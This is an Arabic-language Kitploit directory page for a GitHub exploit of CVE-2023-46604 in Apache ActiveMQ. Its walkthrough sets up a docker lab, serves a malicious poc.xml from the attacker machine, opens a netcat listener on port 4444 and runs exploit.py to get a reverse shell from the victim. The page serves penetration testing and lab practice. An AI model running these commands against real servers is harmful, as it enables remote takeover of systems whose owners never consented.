Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-46604 — استغلال لثغرة CVE-2023-46604 في Apache ActiveMQ، يتيح تنفيذ الأكواد عن بُعد عبر حمولات XML مصممة خصيصًا وإنشاء قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/ccievoice2009/cve-2023-46604
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubccievoice2009/cve-2023-46604

CVE-2023-46604

استغلال لثغرة CVE-2023-46604 في Apache ActiveMQ، يتيح تنفيذ الأكواد عن بُعد عبر حمولات XML مصممة خصيصًا وإنشاء قشرة عكسية.

عرض المستودع
36منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-46604

image

قم ببناء docker-compose يحتوي على صورتين: جهاز الضحية والجهاز الهدف وفقًا للبيئة المطلوبة. على جهاز الضحية، قم بتشغيل ActiveMQ.

انتقل إلى جهاز المهاجم: • افتح خدمة HTTP لإرسال الـ PoC: python3 -m http.server

• استخدم netcat للاستماع إلى الاتصالات الواردة إلى جهاز المهاجم: nc -nlvp 4444

• أرسل الحمولة لإنشاء اتصال reverse shell بجهاز المهاجم: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml حيث:

  • Exploit.py: ملف الكود الخاص باستغلال الثغرة.
  • -i 172.18.0.3: عنوان IP لجهاز إرسال الحمولة.
  • -p 61616: المنفذ الذي يستمع عليه ActiveMQ الخاص بجهاز الضحية.
  • --xml http://172.18.0.2:8000/poc.xml: عنوان URL لملف poc.xml على جهاز المهاجم.

يمكن ملاحظة أنه بعد تنفيذ الأمر الخاص بتشغيل ملف exploit.py، يرسل كود الاستغلال حزمة poc.xml عبر خادم الويب إلى الهدف وهو عنوان خدمة ActiveMQ التي تعمل على الخادم الهدف. وفي نفس الوقت، يتلقى خادم HTTP على جهاز المهاجم طلبًا مرسلًا من عنوان IP الخاص بجهاز الهدف.

بعد إرسال الحمولة، انتقل إلى الطرفية التي تستمع على المنفذ 4444 على جهاز المهاجم. نلاحظ أن reverse shell الخاص بجهاز الضحية قد تم إرساله.

تنزيل الأداة